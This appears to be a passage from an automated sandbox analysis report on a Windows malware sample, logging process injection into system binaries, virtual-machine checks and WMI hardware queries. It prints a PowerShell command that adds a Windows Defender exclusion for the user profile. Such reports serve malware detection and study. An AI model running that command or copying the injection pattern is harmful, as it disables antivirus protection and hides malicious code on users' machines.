Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory allocated: 2B683260000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory allocated: 2B684BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory allocated: 2B6A4BC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: 17BDCB80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: 17BDE4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: 17BFE4E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: 20587820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: 20589120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: 205A9120000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 5BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 7BD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Memory allocated: 5D40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5974	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3844	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Window / User API: threadDelayed 820	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7826
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1622

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep count: 5974 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5892	Thread sleep count: 3844 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6608	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3948	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 6712 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep count: 998 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 7826 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep count: 1622 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2928	Thread sleep time: -4611686018427385s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

Code function: 0_2_00007FF7F30D4720 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7F30D4720

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: ngen.exe, 00000005.00000002.2187736884.00000000052E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wmplayer.exe, 0000001D.00000003.2487624297.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
Source: wmplayer.exe, 0000001D.00000003.2487624297.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: svchost.exe, 00000008.00000002.3309172378.000001E43022B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3311162257.000001E435859000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wmplayer.exe, 0000001D.00000003.2487624297.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: ilasm.exe, 00000019.00000002.3314816848.000000000AE70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F30C5600 RtlAddVectoredExceptionHandler,	0_2_00007FF7F30C5600
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Code function: 0_2_00007FF7F312B544 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7F312B544
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF703015600 RtlAddVectoredExceptionHandler,	13_2_00007FF703015600
Source: C:\Users\user\KxgGGaiW3E.exe	Code function: 13_2_00007FF70307B544 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	13_2_00007FF70307B544

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 720000	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 722000	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 4E7A008	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\svchost.exe base: 402000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\svchost.exe base: 720000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\svchost.exe base: 722000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\cmd.exe base: 402000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\cmd.exe base: 720000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\System32\cmd.exe base: 722000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 400000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 402000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 720000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 722000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe base: 5334008	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 402000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 720000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 722000	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: DA0008	Jump to behavior

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\Desktop\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ngen.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\KxgGGaiW3E.exe	Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=wmplayer.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
